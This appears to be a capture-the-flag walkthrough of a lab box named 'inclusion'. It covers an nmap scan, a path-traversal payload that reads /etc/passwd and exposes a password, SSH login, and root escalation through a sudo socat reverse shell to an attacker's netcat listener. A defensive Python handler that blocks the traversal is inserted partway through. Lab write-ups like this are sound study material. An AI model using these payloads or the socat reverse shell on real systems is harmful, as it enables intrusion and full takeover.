1. Nmap

$ nmap 10.10.161.132
Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-20 10:48 AEST
Nmap scan report for 10.10.161.132
Host is up (0.29s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

2. HTTP

Page format: 10.10.161.132/article?name=hacking

Try LFI: 10.10.161.132/article?name=../../../../etc/passwd → success!

Atypical line in the returned /etc/passwd: #falconfeast:rootpassword
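
A defensive counterpart to the LFI in step 2, added here as an example and not code from the target application (whose source this page does not show): a handler for the ?name= value that only serves files whose fully resolved path stays inside the article directory. The names resolve_article, read_article and the directory layout are assumptions, and the sample files are constructed.

```python
import tempfile
from pathlib import Path

class ArticleNotFound(Exception):
    """Raised for any name that does not map to a file inside the article directory."""

def resolve_article(base_dir, name):
    """Map the ?name= value to a file under base_dir, or raise ArticleNotFound.

    The containment check runs on the fully resolved path, so "../" sequences,
    absolute paths and symlinks that point outside base_dir are all rejected.
    """
    if not name or "\x00" in name:
        raise ArticleNotFound(name)
    base = Path(base_dir).resolve()
    candidate = (base / name).resolve()
    try:
        candidate.relative_to(base)  # ValueError if candidate is outside base
    except ValueError:
        raise ArticleNotFound(name) from None
    if not candidate.is_file():
        raise ArticleNotFound(name)
    return candidate

def read_article(base_dir, name):
    return resolve_article(base_dir, name).read_text()

def demo():
    """Constructed layout: one article, one file outside it, one symlink escaping it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        articles = root / "articles"
        articles.mkdir()
        (articles / "hacking").write_text("article body")
        (root / "secret").write_text("outside the article directory")
        (articles / "link").symlink_to(root / "secret")
        names = ["hacking", "../secret", "../../../../etc/passwd", "/etc/passwd", "link", ""]
        results = {}
        for name in names:
            try:
                results[name] = read_article(articles, name)
            except ArticleNotFound:
                results[name] = None  # handler would answer 404 here
        return results

if __name__ == "__main__":
    for name, body in demo().items():
        print(repr(name), "->", "served" if body is not None else "rejected")
```

Every rejected case raises the same exception, so the response does not reveal whether a path outside the article directory exists.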

3. SSH

@kali:~$ ssh [email protected]
[email protected]'s password: rootpassword
falconfeast@inclusion:~$

falconfeast@inclusion:~$ cat user.txt -> success!

4. PrivEsc

# SSH
falconfeast@inclusion:~$ sudo -l
Matching Defaults entries for falconfeast on inclusion:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User falconfeast may run the following commands on inclusion:
    (root) NOPASSWD: /usr/bin/socat

# https://gtfobins.github.io/gtfobins/socat/

# Kali
@kali:~$ nc -lnvp 4444
listening on [any] 4444 ...

# SSH
falconfeast@inclusion:~$ RHOST=<my-THM-IP>
falconfeast@inclusion:~$ RPORT=4444
falconfeast@inclusion:~$ sudo socat tcp-connect:$RHOST:$RPORT exec:/bin/sh,pty,stderr,setsid,sigint,sane

# Kali
connect to [<my-THM-IP>] from (UNKNOWN) [10.10.161.132] 38924
/bin/sh: 0: can't access tty; job control turned off
# whoami
root

# cat /root/root.txt
cat /root/root.txt -> success!